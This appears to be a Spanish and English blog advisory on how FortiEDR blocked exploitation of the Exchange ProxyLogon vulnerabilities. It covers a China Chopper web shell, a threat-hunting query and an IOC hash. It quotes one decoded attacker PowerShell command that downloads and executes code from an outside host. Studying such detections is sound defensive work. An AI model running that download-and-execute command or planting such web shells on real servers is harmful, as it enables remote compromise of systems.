Consulta técnica sobre FortiEDR
Descripción
Los actores de amenazas están aprovechando activamente las vulnerabilidades recientes de ejecución remota de código en MS Exchange Server 2013, Exchange Server 2016 y Exchange server 2019.
Con las últimas versiones de FortiEDR (v4 o v5) instaladas en su host de MS Exchange (Windows Server), está protegido del exploit de día cero, y también puede obtener información si alguien ha intentado explotarlo.
In this operation, four specific vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) are chained together to allow the threat actor to exploit on-premise Exchange servers. The attack chain targets a Microsoft Exchange server that is able to receive untrusted connections from an external source.
After exploiting these vulnerabilities to gain initial access, attackers deployed web shells on the compromised servers. Web shells potentially allow attackers to steal data and perform other malicious activities that lead to further compromise.
FortiEDR detects and blocks the web shells from executing, thereby defusing the exploit.
Ejecución previa de la solución
FortiEDR blocked adversaries attempt to drop the web shells on the vulnerable on-premise exchange servers.The web shell “discover.aspx” with the following script was blocked. After dropping the web shell, attacker would send a post request to it, passing the malicious commands in the parameter “Ananas”.Rules TriggeredThe threat marked as “MSIL/Chopper.Altr”, as this web shell also known as China Chopper was commonly used by malicious Chinese actors.The rule “Malicious File Detected” got triggered with the following automated analysis comment.
“The file was identified as malicious by our machine-learning engine or by other means, based on analysis of the file.”
In this instance, FortiEDR blocked w3wp.exe process from creating a web shell on a vulnerable exchange server.Post-ExecutionFortiEDR blocked the exploitation activity of these web shells. w3wp.exe (the IIS process associated with Exchange web front-end) spawning cmd.exe to run PowerShell to download additional payloads was blocked.Rules TriggeredThe policy and rule “Suspicious Application” got triggered with the following automated analysis comment.
“Fileless malware detected. Attempt to download and execute a remote command using powershell from a suspicious context. A base64 encoded code was executed on the system using powershell.exe. The command -enc was executed using PowerShell. The decoded command is: IEX (New-Object Net.WebClient).downloadstring(‘http://p.estonine.com/p?e’).”
Threat HuntingFortiEDR’s (v5) Threat Hunting feature enables you to conduct further investigation. The following query helps to identify web shell usage and it can also be scheduled to run automatically to notify events that matches the query.Type:«Process Creation» AND Source.Process.Name:»w3wp.exe» AND Target.Process.Name:»cmd.exe»Default FortiEDR and FortiXDR deployments detect and block post-exploitation activity, including dumping the LSASS memory, running the Nishang and PowerCat tools described in the Microsoft blog.The latest FortiEDR v4.x and 5.x versions successfully detect and block the exploitation of Microsoft Exchange server.IOC:1e0803ffc283dd04279bf3351b92614325e643564ed5b4004985eb0486bf44eeFor additional information, please refer to the following blogs
¡Déjanos cualquier duda sobre FortiEDR aquí abajo!
¿Te ha resultado útil??
0 / 0
Hola, somos Mila Jiménez y César Sánchez. Dos apasionados de la ciberseguridad con muchos años de experiencia. Hemos trabajado en muchas empresas del mundo TI y ahora nos apetece compartir nuestro conocimiento con cualquiera que lo necesite.
¡Si te gusta nuestro contenido puedes invitarnos a un café AQUÍ!